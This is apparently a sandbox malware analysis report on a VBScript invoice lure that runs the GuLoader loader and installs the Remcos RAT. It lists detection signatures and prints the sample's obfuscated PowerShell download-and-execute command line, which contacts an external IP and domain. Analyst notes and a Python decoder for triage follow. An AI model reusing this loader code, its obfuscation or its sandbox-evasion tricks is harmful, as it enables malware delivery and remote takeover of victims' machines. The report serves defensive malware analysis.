Windows
Analysis Report
Revised Invoice 7389293.vbs
Overview
General Information
Detection: GuLoader, Remcos
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Obfuscated command line found
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Uses dynamic DNS services
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
  - wscript.exe (PID: 6952, MD5: A47CBE969EA935BDD3AB568BB126BC80)
    cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Revised Invoice 7389293.vbs"
    - powershell.exe (PID: 6348)
      cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Relinquishments Middelvejen Oksehalens Sekstenaarsfdselsdagens Transceive2 Bewailment Prmielaanets opbyggendes Kulturudbuddets156 helliggjordes disrates Corrosible ladybug Opvikle Udvalgsprocedurens191 Eutaxies Anaphora Radierer Testatorernes Optegnelsesbger Ministrant187 Algums Indberetningspligter Wakerobin Relinquishments Middelvejen Oksehalens Sekstenaarsfdselsdagens Transceive2 Bewailment Prmielaanets opbyggendes Kulturudbuddets156 helliggjordes disrates Corrosible ladybug Opvikle Udvalgsprocedurens191 Eutaxies Anaphora Radierer Testatorernes Optegnelsesbger Ministrant187 Algums Indberetningspligter Wakerobin';If (${host}.CurrentCulture) {$Cuculidae++;}Function Glycosemia205($Drfyldingernes){$Folkloric=$Drfyldingernes.Length-$Cuculidae;$Decalvant='SUBsTRI';$Decalvant+='ng';For( $Fritures=1;$Fritures -lt $Folkloric;$Fritures+=2){$Relinquishments+=$Drfyldingernes.$Decalvant.Invoke( $Fritures, $Cuculidae);}$Relinquishments;}function Eksistensminimas($Rettesnorene){ &($Prosadigtene) ($Rettesnorene);}$signallygtens=Glycosemia205 'AM.o z i l.l Ra./ 5U. 0 , b( Wsi.n Ed o w s, ,NdT. 1C0M . 0U;, SW i n 6 4A;t .x 6 4G; Tr vK: 1 2 G1 . 0n). AG,e cOk o S/ 2 0 1 0 ,0 1A0R1. ,F itrMerf So,xO/ 1M2 1 .A0F ';$Millihg=Glycosemia205 ' UCs eor - A,gDe.nFt ';$Transceive2=Glycosemia205 'sh,t t pD: /S/N 1 0 3 ..1F 9E5 .U2 3N 7S. 4.3,/ N y.e t .K qOxFdS> h tAt.pSsE:P /,/Tm,i l aDn aRcOe. sA.Cc,o,m / N,y.e t ..qAxEdv ';$Mellemliggende=Glycosemia205 ',>. ';$Prosadigtene=Glycosemia205 'DiAeSx ';$Distendedly='opbyggendes';$Tilbageholdelses = Glycosemia205 'ce .c,hMoU S% ,aRp.pKd a RtDaS%s\ s .tBa,l lLm aUnP. FAr BoN &C&K I eOcEhco St ';Eksistensminimas (Glycosemia205 'D$ g .lHoEbSaNl P:SP a.rua ,l l e lRe Vd =.( cSm Td ./Uc $ GT,i l,b a Bg e.h o,l Pd.e.l s.e FsS)H ');Eksistensminimas (Glycosemia205 'U$igIlSo bSaAl :US Ue.kUsLtMe UnHa,a rBs Cf,dSsFeel fs d.aIgZe unMsH=p$,T ArUa.nAs,c UePi.v e.2 .Os,p.l,i ,tI(H$UM e .lPlDePm.l .iBg.gFeVn d eT)I ');Eksistensminimas (Glycosemia205 ' [ N e .t,.oSAe.r v iRcEe.P Do iUn t M Fa,n a,g e Ir ]L:K: S e.c uFrfi t y PSrNo StCoScBo,l =s M[ NR e.tU..SSe, c u rTi t y,PSrDo tG oHcPoClrT, yBpAeF] :A :CT.lOs 1D 2 ');$Transceive2=$Sekstenaarsfdselsdagens[0];$Lothar= (Glycosemia205 'A$,gfl o b aUl :,D i s eJnLtT e.r =VNNeR w - O.bRj. eBc tC S y ,s t e,mI. AN.e tk. W TeIb,CFl.i le,n t');$Lothar+=$Paralleled[1];Eksistensminimas ($Lothar);Eksistensminimas (Glycosemia205 'S$DDRiC sDeTnGt.e rS. HPeRaN d eSrKs [C
      (The command line is cut off at this point in the report. It was reassembled from the column-wrapped extract; whitespace inside the single-quoted obfuscated literals follows the extract and is not byte-exact.)

Stage-1 notes on the PowerShell command line:
- Glycosemia205 is the string decoder. It walks its argument from index 1 in steps of 2 and appends Substring($i, $Cuculidae) each time, stopping before Length - $Cuculidae, so every second character is plaintext and the characters in between are junk.
- $Cuculidae starts undefined (0) and is incremented only if ${host}.CurrentCulture is non-null, which is the case in a real PowerShell host. In a host that does not expose CurrentCulture every Substring call has length 0, all decoded strings are empty, and nothing executes: an emulator check.
- Eksistensminimas runs &($Prosadigtene) on its argument. $Prosadigtene decodes from 'DiAeSx ' to iex, so each Eksistensminimas call is an Invoke-Expression of a decoded statement.
- $Mellemliggende decodes from ',>. ' to '>'. The decoded statements read as $global:Paralleled=(cmd /c $Tilbageholdelses), $global:Sekstenaarsfdselsdagens=$Transceive2.Split($Mellemliggende) and [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $Transceive2 is therefore a '>'-separated list of download URLs of which element [0] is used first, and $signallygtens and $Millihg hold the browser User-Agent header used for the download (matching the "Uses a known web browser user agent" signature).
- $Lothar decodes to $global:Disenter=New-Object System.Net.WebClient, has the second line of the cmd /c output appended, and is then executed; the last visible statement begins $Disenter.Headers[ and is truncated.
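Added example, not part of the sandbox report or of the sample: a Python mirror of the Glycosemia205 decoder for triaging a stage-1 command line offline, including the empty-output path taken when ${host}.CurrentCulture is absent. The helper and variable names are the ones in the command line above, and the two short literals 'DiAeSx ' and ',>. ' are copied from it; the stage-1 fragment SAMPLE_STAGE1, its junk characters, its plaintexts and the URLs in it are constructed for this example (documentation-reserved hosts, not indicators from the sample).

```python
import random
import re


def guloader_decode(encoded: str, cuculidae: int = 1) -> str:
    """Mirror of Glycosemia205: for i = 1, 3, 5, ... while i < len - $Cuculidae,
    append encoded.Substring(i, $Cuculidae).  $Cuculidae is 1 in a real host
    (${host}.CurrentCulture is set); with 0 every Substring is empty, so the
    script decodes nothing and runs nothing (the emulator check)."""
    limit = len(encoded) - cuculidae            # $Folkloric in the sample
    return "".join(encoded[i:i + cuculidae] for i in range(1, limit, 2))


def guloader_encode(plain: str, seed: int = 7, junk: str = "ABCDEFG .,:") -> str:
    """Inverse of the decoder, used only to build constructed input here:
    one junk character before every plaintext character, plus one at the end."""
    rng = random.Random(seed)
    out = []
    for ch in plain:
        out.append(rng.choice(junk))
        out.append(ch)
    out.append(rng.choice(junk))                # dropped by the 'i -lt limit' bound
    return "".join(out)


def decode_literals(script: str, helper: str = "Glycosemia205", cuculidae: int = 1) -> list:
    """Decode every single-quoted literal passed to the helper, in script order.
    (PowerShell writes a literal quote inside '...' as ''; this sample has none.)"""
    pat = re.compile(re.escape(helper) + r"\s*'([^']*)'")
    return [guloader_decode(m.group(1), cuculidae) for m in pat.finditer(script)]


def extract_urls(decoded: list, sep: str = ">") -> list:
    """Stage 1 keeps its download URLs in one literal joined by a separator that
    is itself decoded ('>' in the sample) and uses element [0]; return all of them."""
    urls = []
    for text in decoded:
        for part in text.split(sep):
            if re.match(r"https?://", part):
                urls.append(part)
    return urls


def triage(script: str, cuculidae: int = 1) -> dict:
    """Decoded literals plus the download URL list for one stage-1 script."""
    decoded = decode_literals(script, cuculidae=cuculidae)
    return {"decoded": decoded, "urls": extract_urls(decoded)}


# Literals copied from the command line above; short enough to survive the wrapping.
REPORT_LITERALS = {"Prosadigtene": "DiAeSx ", "Mellemliggende": ",>. "}

# Constructed stage-1 fragment in the shape of the sample's command line.
# Hosts are documentation/reserved names (198.51.100.7, example.invalid), not
# indicators from the sample; the junk characters come from guloader_encode.
SAMPLE_STAGE1 = "".join([
    "$Millihg=Glycosemia205 '", guloader_encode("User-Agent"), "';",
    "$Transceive2=Glycosemia205 '",
    guloader_encode("http://198.51.100.7/Nyet.bin>https://example.invalid/Nyet.bin"), "';",
    "$Mellemliggende=Glycosemia205 '", guloader_encode(">"), "';",
    "$Prosadigtene=Glycosemia205 '", guloader_encode("iex"), "';",
    "$Transceive2=$Sekstenaarsfdselsdagens[0];",
])


if __name__ == "__main__":
    for name, lit in REPORT_LITERALS.items():
        print(f"{name}: {lit!r} -> {guloader_decode(lit)!r}")
    report = triage(SAMPLE_STAGE1)
    for s in report["decoded"]:
        print(repr(s))
    print("download URLs:", report["urls"])
    print("without CurrentCulture:", triage(SAMPLE_STAGE1, cuculidae=0))
```

Running triage with cuculidae=0 reproduces what a minimal host without CurrentCulture would see: every literal decodes to an empty string, so the Invoke-Expression calls run nothing and no URL is ever contacted. For a real command line, paste the "cls;write ..." argument into triage as-is after confirming the helper name; the regex does not handle doubled single quotes inside literals.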